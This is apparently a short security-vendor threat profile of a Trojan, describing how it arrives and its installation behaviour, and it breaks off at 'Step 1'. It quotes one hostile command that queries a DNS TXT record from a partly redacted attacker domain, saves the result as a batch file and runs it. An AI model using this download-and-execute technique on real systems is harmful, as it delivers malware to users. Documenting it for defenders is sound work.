This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan adds the following processes:

  • cd %TMP% & NSlookup -type=TXT {BLOCKED}wdobdrv.com | findstr """" > Taste.cmd & Taste.cmd

It uses common file icons to trick a user into thinking that the files are legitimate.

This Trojan does the following:

  • It queries for the TXT record of the following domain from the DNS server:
    • {BLOCKED}wdobdrv.com
  • It saves result of the DNS lookup to a file and executes it:

Step 1
